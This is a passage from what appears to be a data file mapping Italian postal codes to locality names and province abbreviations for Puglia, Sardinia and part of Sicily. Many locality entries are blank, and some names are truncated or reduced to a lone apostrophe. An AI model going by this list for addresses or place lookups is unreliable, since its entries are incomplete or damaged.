["", "BR"], ["", "BR"], ["Selva", "BR"], ["", "BR"], ["Fasano", "BR"], ["", "BR"], ["", "BR"], ], "72016": [["", "BR"], ["", "BR"]], "72017": [["Ostuni", "BR"]], "72018": [["", "BR"]], "72019": [["", "BR"]], "72020": [["", "BR"], ["Torchiarolo", "BR"], ["Erchie", "BR"], ["Tuturano", "BR"]], "72021": [["", "BR"], ["", "BR"], ["Capece", "BR"]], "72022": [["Latiano", "BR"]], "72023": [["Mesagne", "BR"]], "72024": [["Oria", "BR"], ["", "BR"], ["", "BR"]], "72025": [["", "BR"]], "72026": [["", "BR"]], "72027": [["", "BR"]], "72028": [["", "BR"]], "72029": [["", "BR"]], "72100": [["Brindisi Casale", "BR"], ["Brindisi", "BR"]], "76011": [["Bisceglie", "BT"]], "76012": [["", "BT"], ["Loconia", "BT"]], "76013": [["", "BT"]], "76014": [["Spinazzola", "BT"]], "76015": [["Trinitapoli", "BT"]], "76016": [["", "BT"]], "76017": [["", "BT"]], "76121": [["Barletta", "BT"]], "76123": [["Montegrosso", "BT"], ["Andria", "BT"]], "76125": [["Trani", "BT"]], "71010": [ ["", "FG"], ["", "FG"], ["", "FG"], ["Carpino", "FG"], ["Serracapriola", "FG"], ["Ischitella", "FG"], ["", "FG"], ["Ripalta", "FG"], ["Difensola", "FG"], ["Lesina", "FG"], ["", "FG"], ["", "FG"], ["Chieuti", "FG"], ["Peschici", "FG"], ], "71011": [["Apricena", "FG"]], "71012": [["", "FG"]], "71013": [["", "FG"], ["Matine", "FG"]], "71014": [["", "FG"], ["", "FG"]], "71015": [["", "FG"]], "71016": [["", "FG"]], "71017": [["Petrulli", "FG"], ["Torremaggiore", "FG"]], "71018": [["Umbra", "FG"], ["", "FG"], ["", "FG"]], "71019": [["Vieste", "FG"]], "71020": [ ["", "FG"], ["", "FG"], ["Faeto", "FG"], ["", "FG"], ["", "FG"], ["Panni", "FG"], ["", "FG"], ["", "FG"], ], "71021": [["Accadia", "FG"]], "71022": [["", "FG"], ["", "FG"], ["", "FG"]], "71023": [["Bovino", "FG"]], "71024": [["Candela", "FG"]], "71025": [["", "FG"]], "71026": [["Deliceto", "FG"]], "71027": [["", "FG"]], "71028": [["", "FG"]], "71029": [["", "FG"], ["Troia", "FG"]], "71030": [ ["", "FG"], ["", "FG"], ["", "FG"], ["Zapponeta", "FG"], ["Carlantino", "FG"], ["Volturino", "FG"], ["Fonterosa", "FG"], ["Macchia", "FG"], ["Mattinata", "FG"], ["", "FG"], ], "71031": [["Alberona", "FG"]], "71032": [["Biccari", "FG"], ["Berardinone", "FG"]], "71033": [["", "FG"]], "71034": [["", "FG"]], "71035": [["", "FG"]], "71036": [["Lucera", "FG"], ["Palmori", "FG"]], "71037": [["", "FG"]], "71038": [["Pietramontecorvino", "FG"]], "71039": [["", "FG"]], "71040": [ ["", "FG"], ["", "FG"], ["Ordona", "FG"], ["", "FG"], ["", "FG"], ["Mezzanone", "FG"], ["", "FG"], ], "71041": [["Carapelle", "FG"]], "71042": [ ["'", "FG"], ["Cerignola", "FG"], ["", "FG"], ["", "FG"], ["Tressanti", "FG"], ["Moschella", "FG"], ], "71043": [["Siponto", "FG"], ["Manfredonia", "FG"]], "71045": [["Orta Nova", "FG"]], "71047": [["Stornara", "FG"]], "71048": [["Stornarella", "FG"]], "71100": [ ["Incoronata", "FG"], ["Tavernola", "FG"], ["Arpinova", "FG"], ["", "FG"], ["Segezia", "FG"], ["Foggia", "FG"], ["", "FG"], ["", "FG"], ["Cervaro", "FG"], ], "73010": [ ["Lequile", "LE"], ["", "LE"], ["Dragoni", "LE"], ["Sternatia", "LE"], ["", "LE"], ["", "LE"], ["Riesci", "LE"], ["Veglie", "LE"], ["", "LE"], ["", "LE"], ["", "LE"], ["Zollino", "LE"], ["", "LE"], ["Arnesano", "LE"], ["Galugnano", "LE"], ["Surbo", "LE"], ["Soleto", "LE"], ["Guagnano", "LE"], ], "73011": [["Alezio", "LE"]], "73012": [["", "LE"]], "73013": [["Collemeto", "LE"], ["Galatina", "LE"], ["Noha", "LE"], ["Santa Barbara", "LE"]], "73014": [["Gallipoli", "LE"]], "73015": [["", "LE"]], "73016": [["San ", "LE"]], "73017": [["", "LE"], ["", "LE"], ["Sannicola", "LE"], ["Chiesanuova", "LE"]], "73018": [["Squinzano", "LE"]], "73019": [["Trepuzzi", "LE"]], "73020": [ ["Serrano", "LE"], ["Palmariggi", "LE"], ["Melpignano", "LE"], ["", "LE"], ["", "LE"], ["Giurdignano", "LE"], ["", "LE"], ["Botrugno", "LE"], ["", "LE"], ["Cavallino", "LE"], ["", "LE"], ["Martignano", "LE"], ["Nociglia", "LE"], ["Cutrofiano", "LE"], ["Vitigliano", "LE"], ["Cerfignano", "LE"], ["Scorrano", "LE"], ["Castromediano", "LE"], ["Casamassella", "LE"], ["", "LE"], ["Cannole", "LE"], ["Cursi", "LE"], ["", "LE"], ], "73021": [["Calimera", "LE"]], "73022": [["", "LE"]], "73023": [["Merine", "LE"], ["Lizzanello", "LE"]], "73024": [["Maglie", "LE"], ["Morigino", "LE"]], "73025": [["Martano", "LE"]], "73026": [ ["", "LE"], ["", "LE"], ["Roca", "LE"], ["", "LE"], ["Borgagne", "LE"], ["Melendugno", "LE"], ], "73027": [["", "LE"], ["Cocumola", "LE"], ["", "LE"]], "73028": [["Otranto", "LE"]], "73029": [ ["Struda'", "LE"], ["Pisignano", "LE"], ["Vanze", "LE"], ["", "LE"], ["Vernole", "LE"], ["Acaia", "LE"], ], "73030": [ ["Tiggiano", "LE"], ["", "LE"], ["Diso", "LE"], ["Giuggianello", "LE"], ["", "LE"], ["Ortelle", "LE"], ["Marittima", "LE"], ["Vignacastrisi", "LE"], ["Sanarica", "LE"], ["Surano", "LE"], ], "73031": [["Alessano", "LE"], ["Montesardo", "LE"]], "73032": [["Castiglione", "LE"], ["Andrano", "LE"]], "73033": [["Corsano", "LE"]], "73034": [["", "LE"], ["", "LE"], ["Arigliano", "LE"]], "73035": [["Miggiano", "LE"]], "73036": [["", "LE"]], "73037": [["Poggiardo", "LE"], ["Vaste", "LE"]], "73038": [["Spongano", "LE"]], "73039": [ ["Tutino", "LE"], ["Depressa", "LE"], ["Sant'Eufemia", "LE"], ["Tricase Porto", "LE"], ["Lucugnano", "LE"], ["", "LE"], ["Tricase", "LE"], ], "73040": [ ["Neviano", "LE"], ["", "LE"], ["", "LE"], ["Aradeo", "LE"], ["", "LE"], ["Alliste", "LE"], ["Felline", "LE"], ["", "LE"], ["", "LE"], ["Specchia", "LE"], ["", "LE"], ["Collepasso", "LE"], ["Melissano", "LE"], ["Supersano", "LE"], ["Leuca", "LE"], ["Salignano", "LE"], ], "73041": [["Magliano", "LE"], ["Carmiano", "LE"]], "73042": [["Casarano", "LE"]], "73043": [["Copertino", "LE"]], "73044": [["Galatone", "LE"]], "73045": [["Leverano", "LE"]], "73046": [["Matino", "LE"]], "73047": [["", "LE"]], "73048": [["Nardo'", "LE"]], "73049": [["Ruffano", "LE"], ["Torrepaduli", "LE"]], "73050": [ ["'", "LE"], ["Ruggiano", "LE"], ["Salve", "LE"], ["", "LE"], ["", "LE"], ["", "LE"], ["Boncore", "LE"], ["", "LE"], ["Secli'", "LE"], ], "73051": [["", "LE"], ["Novoli", "LE"]], "73052": [["Parabita", "LE"]], "73053": [["Patu'", "LE"]], "73054": [["Presicce", "LE"]], "73055": [["Racale", "LE"]], "73056": [["Taurisano", "LE"]], "73057": [["Taviano", "LE"]], "73058": [["Tuglie", "LE"]], "73059": [["Gemini", "LE"], ["Ugento", "LE"]], "73100": [["Frigole", "LE"], ["Lecce", "LE"], ["", "LE"], ["", "LE"]], "74010": [["Statte", "TA"]], "74011": [ ["", "TA"], ["", "TA"], ["", "TA"], ["Castellaneta", "TA"], ], "74012": [["Crispiano", "TA"]], "74013": [["Ginosa", "TA"]], "74014": [["Laterza", "TA"]], "74015": [ ["", "TA"], ["", "TA"], ["", "TA"], ["Carpari", "TA"], ["", "TA"], ], "74016": [["Massafra", "TA"]], "74017": [["Mottola", "TA"], ["", "TA"]], "74018": [["Palagianello", "TA"]], "74019": [["Palagiano", "TA"], ["", "TA"]], "74020": [ ["Monteparano", "TA"], ["", "TA"], ["Leporano", "TA"], ["Torricella", "TA"], ["", "TA"], ["Faggiano", "TA"], ["Montemesola", "TA"], ["Roccaforzata", "TA"], ["Lizzano", "TA"], ["Avetrana", "TA"], ["Maruggio", "TA"], ["Monteiasi", "TA"], ], "74021": [["Carosino", "TA"]], "74022": [["Fragagnano", "TA"]], "74023": [["Grottaglie", "TA"]], "74024": [ ["", "TA"], ["Manduria", "TA"], ["San Pietro In Bevagna", "TA"], ["Specchiarica", "TA"], ], "74025": [["", "TA"]], "74026": [["", "TA"], ["Pulsano", "TA"], ["", "TA"], ["", "TA"]], "74027": [["", "TA"]], "74028": [["Sava", "TA"]], "74100": [["", "TA"], ["Talsano", "TA"], ["San Vito Taranto", "TA"], ["Taranto", "TA"], ["Lama", "TA"]], "74121": [["Taranto", "TA"]], "74122": [["Taranto", "TA"]], "74123": [["Taranto", "TA"]], "08030": [ ["Orroli", "CA"], ["Escolca", "CA"], ["Lixius", "CA"], ["Nurallao", "CA"], ["Serri", "CA"], ["Sadali", "CA"], ["Seulo", "CA"], ["Nuragus", "CA"], ["", "CA"], ["Esterzili", "CA"], ["Gergei", "CA"], ["", "NU"], ["Atzara", "NU"], ["Austis", "NU"], ["Gadoni", "NU"], ["Belvi", "NU"], ["Teti", "NU"], ["Genoni", "OR"], ], "08033": [["Isili", "CA"]], "08035": [["Nurri", "CA"]], "08043": [["Escalaplano", "CA"]], "09010": [ ["Siliqua", "CA"], ["Forte Village", "CA"], ["Vallermosa", "CA"], ["Villaspeciosa", "CA"], ["Decimoputzu", "CA"], ["", "CA"], ["Pula", "CA"], ["Uta", "CA"], ["", "CA"], ["Buggerru", "SU"], ["Villamassargia", "SU"], ["", "SU"], ["Palmas", "SU"], ["Masainas", "SU"], ["", "SU"], ["Giba", "SU"], ["Rosas", "SU"], ["Musei", "SU"], ["Terraseo", "SU"], ["Matzaccara", "SU"], ["Gonnesa", "SU"], ["Terresoli", "SU"], ["Fluminimaggiore", "SU"], ["", "SU"], ["", "SU"], ["Riomurtas", "SU"], ["Piscinas", "SU"], ["Portoscuso", "SU"], ["Perdaxius", "SU"], ["Villarios", "SU"], ["Villaperuccio", "SU"], ["Paringianu", "SU"], ["Narcao", "SU"], ["Tratalias", "SU"], ["Nuxis", "SU"], ["Santadi", "SU"], ], "09012": [["San Leone", "CA"], ["Capoterra", "CA"], ["", "CA"], ["", "CA"]], "09018": [["", "CA"], ["Sarroch", "CA"]], "09019": [["Teulada", "CA"]], "09020": [ ["Samatzai", "CA"], ["Pimentel", "CA"], ["Ussana", "CA"], ["", "SU"], ["Ussaramanna", "SU"], ["Turri", "SU"], ["Genuri", "SU"], ["Villamar", "SU"], ["Siddi", "SU"], ["Villanovafranca", "SU"], ["Gesturi", "SU"], ["Collinas", "SU"], ["", "SU"], ["Villanovaforru", "SU"], ], "09023": [["Monastir", "CA"]], "09024": [["Villagreca", "CA"], ["Nuraminis", "CA"]], "09026": [["San Sperate", "CA"]], "09028": [["Sestu", "CA"]], "09030": [["Elmas", "CA"], ["Pabillonis", "SU"], ["Sardara", "SU"], ["Montevecchio", "SU"], ["Samassi", "SU"]], "09032": [["Assemini", "CA"], ["Macchiareddu", "CA"]], "09033": [["Decimomannu", "CA"]], "09034": [["Villasor", "CA"]], "09040": [ ["Armungia", "CA"], ["Villasalto", "CA"], ["Maracalagonis", "CA"], ["Senorbi'", "CA"], ["Donori'", "CA"], ["", "CA"], ["Suelli", "CA"], ["Goni", "CA"], ["Selegas", "CA"], ["Gesico", "CA"], ["San Vito", "CA"], ["Silius", "CA"], ["", "CA"], ["Guamaggiore", "CA"], ["Guasila", "CA"], ["", "CA"], ["Arixi", "CA"], ["Barrali", "CA"], ["Mandas", "CA"], ["Soleminis", "CA"], ["Ballao", "CA"], ["Villaputzu", "CA"], ["Burcei", "CA"], ["", "CA"], ["Castiadas", "CA"], ["Serdiana", "CA"], ["Sisini", "CA"], ["", "CA"], ["Ortacesus", "CA"], ["", "CA"], ["Furtei", "SU"], ["Segariu", "SU"], ], "09041": [["Dolianova", "CA"]], "09042": [["Monserrato", "CA"]], "09043": [["Muravera", "CA"]], "09044": [["Quartucciu", "CA"]], "09045": [["", "CA"], ["", "CA"]], "09047": [["Selargius", "CA"], ["Su Planu", "CA"]], "09048": [["Sinnai", "CA"]], "09049": [["Villasimius", "CA"]], "09100": [["Cagliari", "CA"]], "09121": [["Cagliari", "CA"]], "09122": [["Cagliari", "CA"]], "09123": [["Cagliari", "CA"]], "09124": [["Cagliari", "CA"]], "09125": [["Cagliari", "CA"]], "09126": [ ["Cagliari", "CA"], ["", "CA"], ["San Bartolomeo", "CA"], ["Lazzaretto", "CA"], ["Poetto", "CA"], ], "09127": [["Cagliari", "CA"]], "09128": [["Cagliari", "CA"]], "09129": [["Cagliari", "CA"]], "09131": [["Cagliari", "CA"]], "09134": [["Cagliari", "CA"], ["Pirri", "CA"]], "08010": [ ["Lei", "NU"], ["Birori", "NU"], ["Noragugume", "NU"], ["Dualchi", "NU"], ["", "OR"], ["Suni", "OR"], ["Magomadas", "OR"], ["", "OR"], ["Sagama", "OR"], ["Flussio", "OR"], ["Montresta", "OR"], ["Tinnura", "OR"], ], "08011": [["Bolotana", "NU"]], "08012": [["Bortigali", "NU"], ["Mulargia", "NU"]], "08015": [["Macomer", "NU"]], "08016": [["Borore", "NU"]], "08017": [["Silanus", "NU"]], "08018": [["Sindia", "NU"]], "08020": [ ["Onifai", "NU"], ["", "NU"], ["", "NU"], ["Ottana", "NU"], ["Onani", "NU"], ["", "NU"], ["Ovodda", "NU"], ["Sant'Efisio", "NU"], ["", "NU"], ["Tiana", "NU"], ["", "NU"], ["Olzai", "NU"], ["Orotelli", "NU"], ["Sarule", "NU"], ["Ovedi'", "NU"], ["Orune", "NU"], ["Berchidda", "NU"], ["Lodine", "NU"], ["Galtelli", "NU"], ["Oniferi", "NU"], ["", "NU"], ["", "NU"], ["Concas", "NU"], ["Osidda", "NU"], ["Torpe'", "NU"], ["Ollolai", "NU"], ["Gavoi", "NU"], ["Brunella", "NU"], ["Lode'", "NU"], ["Talava'", "NU"], ["Irgoli", "NU"], ["Mamone", "NU"], ["Lula", "NU"], ["Loculi", "NU"], ["Posada", "NU"], ["Muvruneddi", "SS"], ["S'Iscala", "SS"], ["Straulas", "SS"], ["", "SS"], ["Agrustos", "SS"], ["Luddui", "SS"], ["Tanaunella", "SS"], ["Nuditta", "SS"], ["Birgalavo'", "SS"], ["Budoni", "SS"], ["", "SS"], ["Malamori'", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["Bircolovo'", "SS"], ["Silimini", "SS"], ["Lutturai", "SS"], ["", "SS"], ["Schifoni", "SS"], ["", "SS"], ["Franculacciu", "SS"], ["", "SS"], ["", "SS"], ["Strugas", "SS"], ["", "SS"], ["", "SS"], ["Pattimedda", "SS"], ["Terrapadedda", "SS"], ["Tiridduli", "SS"], ["", "SS"], ["Budditogliu", "SS"], ["", "SS"], ["Lotturai", "SS"], ["", "SS"], ["Su Linalvu", "SS"], ["Rinaggiu", "SS"], ["Suaredda", "SS"], ["Limpostu", "SS"], ["", "SS"], ["Traversa", "SS"], ["Sitagliacciu", "SS"], ["L'Alzoni", "SS"], ["", "SS"], ["Nuragheddu", "SS"], ["Ottiolu", "SS"], ["Muriscuvo'", "SS"], ["San Pietro", "SS"], ["Puntaldia", "SS"], ["", "SS"], ["Maiorca", "SS"], ["Tamarispa", "SS"], ["", "SS"], ["", "SS"], ["San Silvestro", "SS"], ["Solita'", "SS"], ["Badualga", "SS"], ["", "SS"], ["Limpiddu", "SS"], ["Luttuni", "SS"], ["Berruiles", "SS"], ], "08021": [["Bitti", "NU"]], "08022": [["Dorgali", "NU"], ["", "NU"]], "08023": [["Fonni", "NU"]], "08024": [["Mamoiada", "NU"]], "08025": [["Oliena", "NU"], ["Su Cologone", "NU"]], "08026": [["Orani", "NU"]], "08027": [["Orgosolo", "NU"]], "08028": [ ["", "NU"], ["Orosei", "NU"], ["", "NU"], ["", "NU"], ["", "NU"], ], "08029": [ ["Siniscola", "NU"], ["", "NU"], ["Sarenargiu", "NU"], ["'", "NU"], ["", "NU"], ["", "NU"], ["Berchida", "NU"], ["", "NU"], ["Mandras", "NU"], ["", "NU"], ["Overì", "NU"], ["", "NU"], ], "08031": [["Gidilau", "NU"], ["Aritzo", "NU"]], "08032": [["Desulo", "NU"]], "08036": [["Ortueri", "NU"]], "08037": [["Seui", "NU"]], "08038": [["Sorgono", "NU"]], "08039": [["Tonara", "NU"]], "08040": [ ["S'Arridellu", "NU"], ["Girasole", "NU"], ["Arzana", "NU"], ["Urzulei", "NU"], ["Ardali", "NU"], ["Gairo", "NU"], ["Osini", "NU"], ["", "NU"], ["Ussassai", "NU"], ["Tancau", "NU"], ["Baunei", "NU"], ["Loceri", "NU"], ["Ulassai", "NU"], ["", "NU"], ["Lotzorai", "NU"], ["Triei", "NU"], ["Taquisara", "NU"], ["Talana", "NU"], ["Cardedu", "NU"], ["Elini", "NU"], ["Ilbono", "NU"], ["", "NU"], ], "08042": [["", "NU"]], "08044": [["Jerzu", "NU"]], "08045": [["Lanusei", "NU"]], "08046": [["Perdasdefogu", "NU"]], "08047": [["Migheli", "NU"], ["Tertenia", "NU"]], "08048": [ ["", "NU"], ["", "NU"], ["Calamoresca", "NU"], ["Tortoli'", "NU"], ["", "NU"], ["Arbatax", "NU"], ["", "NU"], ], "08049": [["", "NU"], ["", "NU"]], "08100": [["Nuoro", "NU"], ["", "NU"], ["Manasuddas", "NU"], ["Lollove", "NU"]], "08013": [["Turas", "OR"], ["", "OR"], ["Bosa", "OR"]], "08019": [["Modolo", "OR"]], "08034": [["", "OR"], ["Crastu", "OR"], ["", "OR"], ["Traidodini", "OR"], ["Laconi", "OR"]], "09070": [ ["", "OR"], ["Bauladu", "OR"], ["Norbello", "OR"], ["Zeddiani", "OR"], ["", "OR"], ["Siamaggiore", "OR"], ["Seneghe", "OR"], ["", "OR"], ["", "OR"], ["", "OR"], ["", "OR"], ["Bonarcado", "OR"], ["Zerfaliu", "OR"], ["", "OR"], ["Narbolia", "OR"], ["Mandriola", "OR"], ["Milis", "OR"], ["Nurachi", "OR"], ["Domus", "OR"], ["Paulilatino", "OR"], ["Tramatza", "OR"], ["Aidomaggiore", "OR"], ], "09071": [["Abbasanta", "OR"]], "09072": [["Solanas", "OR"], ["Cabras", "OR"]], "09073": [ ["", "OR"], ["Santa Caterina", "OR"], ["S'Archittu", "OR"], ["Cuglieri", "OR"], ["", "OR"], ], "09074": [["Zuri", "OR"], ["Ghilarza", "OR"]], "09075": [["", "OR"], ["", "OR"]], "09076": [["Sedilo", "OR"]], "09077": [["Solarussa", "OR"]], "09078": [["Sennariolo", "OR"], ["", "OR"]], "09079": [["Tresnuraghes", "OR"]], "09080": [ ["Sorradile", "OR"], ["Soddi'", "OR"], ["Bidoni'", "OR"], ["Senis", "OR"], ["Neoneli", "OR"], ["Siapiccia", "OR"], ["", "OR"], ["", "OR"], ["Boroneddu", "OR"], ["Siamanna", "OR"], ["", "OR"], ["Villaurbana", "OR"], ["", "OR"], ["Mogorella", "OR"], ["Nureci", "OR"], ["Assolo", "OR"], ["Allai", "OR"], ["Asuni", "OR"], ["Tadasuni", "OR"], ], "09081": [["Ardauli", "OR"]], "09082": [["Busachi", "OR"]], "09083": [["Fordongianus", "OR"]], "09084": [["", "OR"]], "09085": [["Ruinas", "OR"]], "09086": [["Samugheo", "OR"]], "09088": [["Ollastra", "OR"], ["Simaxis", "OR"]], "09090": [ ["Gonnoscodina", "OR"], ["", "OR"], ["Baressa", "OR"], ["Morgongiori", "OR"], ["Albagiara", "OR"], ["Sini", "OR"], ["Baradili", "OR"], ["Curcuris", "OR"], ["Masullas", "OR"], ["Pau", "OR"], ["Tiria", "OR"], ["Siris", "OR"], ["Gonnosno'", "OR"], ["Usellus", "OR"], ["Simala", "OR"], ["", "OR"], ], "09091": [["Ales", "OR"]], "09092": [["Arborea", "OR"]], "09093": [["Gonnostramatza", "OR"], ["Pompu", "OR"]], "09094": [["Marrubiu", "OR"], ["Sant'Anna", "OR"]], "09095": [["Mogoro", "OR"]], "09096": [["", "OR"]], "09097": [["lo' D'Arcidano", "OR"]], "09098": [["", "OR"], ["Terralba", "OR"]], "09099": [["Uras", "OR"]], "09170": [ ["Massama", "OR"], ["Oristano", "OR"], ["", "OR"], ["Nuraxinieddu", "OR"], ["Sili'", "OR"], ["", "OR"], ], "07010": [ ["Benetutti", "SS"], ["Bottidda", "SS"], ["'", "SS"], ["Romana", "SS"], ["Nule", "SS"], ["Mara", "SS"], ["Bultei", "SS"], ["Tula", "SS"], ["", "SS"], ["Cossoine", "SS"], ["Giave", "SS"], ["", "SS"], ["Semestene", "SS"], ["Burgos", "SS"], ["Ardara", "SS"], ["Anela", "SS"], ["Illorai", "SS"], ["Esporlatu", "SS"], ["Ittireddu", "SS"], ["", "SS"], ], "07011": [["Bono", "SS"]], "07012": [["Rebeccu", "SS"], ["", "SS"], ["Bonorva", "SS"]], "07013": [["Mores", "SS"]], "07014": [["", "SS"], ["Chilivani", "SS"], ["Ozieri", "SS"], ["Vigne", "SS"], ["Fraigas", "SS"]], "07015": [["Padria", "SS"]], "07016": [["Pattada", "SS"]], "07017": [["Ploaghe", "SS"]], "07018": [["Pozzomaggiore", "SS"]], "07019": [["", "SS"]], "07020": [ ["Budduso'", "SS"], ["", "SS"], ["Vaccileddi", "SS"], ["Padru", "SS"], ["", "SS"], ["", "SS"], ["Monti", "SS"], ["Luogosanto", "SS"], ["", "SS"], ["Telti", "SS"], ["Loiri", "SS"], ["", "SS"], ["Aglientu", "SS"], ["Palau", "SS"], ["Loiri Porto ", "SS"], ["Aggius", "SS"], ], "07021": [ ["Pirazzolu", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["Cannigione", "SS"], ["", "SS"], ["Arzachena", "SS"], ["", "SS"], ], "07022": [["Berchidda", "SS"]], "07023": [["Calangianus", "SS"]], "07024": [["Moneta", "SS"], ["", "SS"], ["La Maddalena", "SS"]], "07025": [["Luras", "SS"]], "07026": [["San Pantaleo", "SS"], ["", "SS"], ["Olbia", "SS"], ["Berchiddeddu", "SS"]], "07027": [["Oschiri", "SS"]], "07028": [["San Pasquale", "SS"], ["", "SS"]], "07029": [["", "SS"], ["Nuchis", "SS"], ["Bassacutena", "SS"]], "07030": [ ["Martis", "SS"], ["Chiaramonti", "SS"], ["Tergu", "SS"], ["", "SS"], ["Bortigiadas", "SS"], ["Muros", "SS"], ["Florinas", "SS"], ["Badesi", "SS"], ["", "SS"], ["Viddalba", "SS"], ["Erula", "SS"], ["Cargeghe", "SS"], ["Bulzi", "SS"], ["Laerru", "SS"], ], "07031": [["", "SS"], ["Castelsardo", "SS"]], "07032": [["Nulvi", "SS"]], "07033": [["Osilo", "SS"], ["Santa Vittoria", "SS"]], "07034": [["Perfugas", "SS"]], "07035": [["Sedini", "SS"]], "07036": [["Sennori", "SS"]], "07037": [["Platamona", "SS"], ["Sorso", "SS"]], "07038": [["", "SS"], ["'", "SS"]], "07039": [["", "SS"], ["Valledoria", "SS"], ["Codaruina", "SS"]], "07040": [ ["Tissi", "SS"], ["Tottubella", "SS"], ["Campanedda", "SS"], ["Palmadula", "SS"], ["Canaglia", "SS"], ["", "SS"], ["Siligo", "SS"], ["Codrongianos", "SS"], ["Stintino", "SS"], ["Rumanedda", "SS"], ["Olmedo", "SS"], ["La Corte", "SS"], ["Argentiera", "SS"], ["Borutta", "SS"], ["Uri", "SS"], ["Bessude", "SS"], ["Putifigari", "SS"], ["Cheremule", "SS"], ["Biancareddu", "SS"], ["Banari", "SS"], ], "07041": [ ["Alghero", "SS"], ["Santa Maria La Palma", "SS"], ["", "SS"], ["Fertilia", "SS"], ["Tramariglio", "SS"], ], "07043": [["Bonnanaro", "SS"]], "07044": [["Ittiri", "SS"]], "07045": [["Ossi", "SS"]], "07046": [ ["", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ], "07047": [["Thiesi", "SS"]], "07048": [["Torralba", "SS"]], "07049": [["Usini", "SS"]], "07100": [ ["Sassari", "SS"], ["Ottava", "SS"], ["", "SS"], ["", "SS"], ["", "SS"], ["Bancali", "SS"], ["Macciadosa", "SS"], ], "09011": [["Calasetta", "SU"], ["Cussorgia", "SU"]], "09013": [ ["", "SU"], ["Sirai", "SU"], ["Barbusi", "SU"], ["Carbonia", "SU"], ["Cortoghiana", "SU"], ["Serbariu", "SU"], ], "09014": [["Carloforte", "SU"]], "09015": [["Domusnovas", "SU"]], "09016": [["Nebida", "SU"], ["Iglesias", "SU"], ["", "SU"], ["Bindua", "SU"], ["Monteponi", "SU"]], "09017": [["Sant'Antioco", "SU"]], "09021": [["Barumini", "SU"]], "09022": [["Lunamatrona", "SU"]], "09025": [["", "SU"], ["Sanluri", "SU"]], "09027": [["Serrenti", "SU"]], "09029": [["Tuili", "SU"], ["Setzu", "SU"]], "09031": [["Gennamari", "SU"], ["", "SU"], ["Arbus", "SU"], ["Ingurtosu", "SU"]], "09035": [["Gonnosfanadiga", "SU"]], "09036": [["Guspini", "SU"]], "09037": [["", "SU"]], "09038": [["Serramanna", "SU"]], "09039": [["Villacidro", "SU"]], "92010": [ ["Burgio", "AG"], ["Lampedusa", "AG"], ["Caltabellotta", "AG"], ["Calamonaci", "AG"], ["Realmonte", "AG"], ["", "AG"], ["", "AG"], ["", "AG"], ["Linosa", "AG"], ["", "AG"], ["Montevago", "AG"], ["", "AG"], ["Siculiana", "AG"], ["Sant'Anna", "AG"], ["Montallegro", "AG"], ["Bivona", "AG"], ], "92011": [["", "AG"]], "92012": [["Cianciana", "AG"]], "92013": [["Menfi", "AG"]], "92014": [["", "AG"]], "92015": [["Raffadali", "AG"]], "92016": [["", "AG"], ["Ribera", "AG"]], "92017": [["", "AG"]], "92018": [["", "AG"]], "92019": [["Sciacca", "AG"]], "92020": [ ["", "AG"], ["", "AG"], ["", "AG"], ["", "AG"], ["", "AG"], ["Castrofilippo", "AG"], ["Racalmuto", "AG"], ["Comitini", "AG"], ["Camastra", "AG"], ["Grotte", "AG"], ["", "AG"], ["", "AG"], ], "92021": [["Aragona", "AG"], ["Caldare", "AG"]], "92022": [["", "AG"], ["Cammarata", "AG"]], "92023": [["", "AG"]], "92024": [["Canicatti'", "AG"]], "92025": [["Zolfare", "AG"], ["", "AG"], ["Casteltermini", "AG"]], "92026": [["Favara", "AG"]], "92027": [["Licata", "AG"]], "92028": [["Naro", "AG"]], "92029": [["", "AG"], ["Ravanusa", "AG"]], "92100": [ ["", "AG"], ["'", "AG"], ["Villaseta", "AG"], ["'", "AG"], ["Agrigento", "AG"], ["Montaperto", "AG"], ["", "AG"], ], "93010": [ ["Campofranco", "CL"], ["Sutera", "CL"], ["Bompensiere", "CL"], ["", "CL"], ["", "CL"], ["Serradifalco", "CL"], ["Milena", "CL"], ["Montedoro", "CL"], ["Villalba", "CL"], ["Marianopoli", "CL"], ["Resuttano", "CL"], ["Delia", "CL"], ], "93011": [["Butera", "CL"]], "93012": [["Gela", "CL"]], "93013": [["Mazzarino", "CL"]], "93014": [["Polizzello", "CL"], ["Mussomeli", "CL"]], "93015": [["Niscemi", "CL"]], "93016": [["Riesi", "CL"]], "93017": [["San Cataldo", "CL"]], "93018": [["Santa Caterina Villarmosa", "CL"]], "93019": [["", "CL"], ["Sommatino", "CL"]], "93100": [ ["Favarella", "CL"], ["", "CL"], ["", "CL"], ["Caltanissetta", "CL"], ], "95010": [ ["", "CT"], ["Milo", "CT"], ["Sant'Alfio", "CT"], ["", "CT"], ["Fornazzo", "CT"], ["Linera", "CT"], ], "95011": [["Pasteria", "CT"], ["Calatabiano", "CT"]], "95012": [ ["Solicchiata", "CT"], ["Passopisciaro", "CT"], ["Mitogio", "CT"], ["Verzella", "CT"], ["", "CT"], ], "95013": [["", "CT"]], "95014": [ ["Trepunti", "CT"], ["Carruba", "CT"], ["", "CT"], ["Giarre", "CT"], ["", "CT"], ["Altarello", "CT"], ["", "CT"], ["", "CT"], ], "95015": [["Linguaglossa", "CT"]], "95016": [ ["Puntalazzo", "CT"], ["Carrabba", "CT"], ["Portosalvo", "CT"], ["", "CT"], ["Nunziata", "CT"], ["Mascali", "CT"], ], "95017": [["Presa", "CT"], ["Vena", "CT"], ["", "CT"]], "95018": [["", "CT"], ["Riposto", "CT"]], "95019": [["", "CT"], ["Fleri", "CT"], ["Sarro", "CT"], ["", "CT"]], "95020": [["", "CT"]], "95021": [["Ficarazzi", "CT"], ["", "CT"], ["Cannizzaro", "CT"], ["", "CT"]], "95022": [ ["Vampolieri", "CT"], ["Nizzeti", "CT"], ["", "CT"], ["", "CT"], ["'", "CT"], ["", "CT"], ], "95024": [ ["", "CT"], ["Acireale", "CT"], ["", "CT"], ["Pozzillo", "CT"], ["Guardia", "CT"], ["Pennisi", "CT"], ["", "CT"], ["Stazzo", "CT"], ["Mangano", "CT"], ["", "CT"], ["Scillichenti", "CT"], ["Santa Maria La Scala", "CT"], ], "95025": [ ["", "CT"], ["Lavina", "CT"], ["", "CT"], ["Santa Maria La Stella", "CT"], ["Monterosso", "CT"], ["Lavinaio", "CT"], ], "95027": [["Cerza", "CT"], ["", "CT"]], "95028": [["Valverde", "CT"]], "95029": [["Viagrande", "CT"]], "95030": [ ["", "CT"], ["Nicolosi", "CT"], ["", "CT"], ["Mascalucia", "CT"], ["Ragalna", "CT"], ["", "CT"], ["Maniace", "CT"], ["Pedara", "CT"], 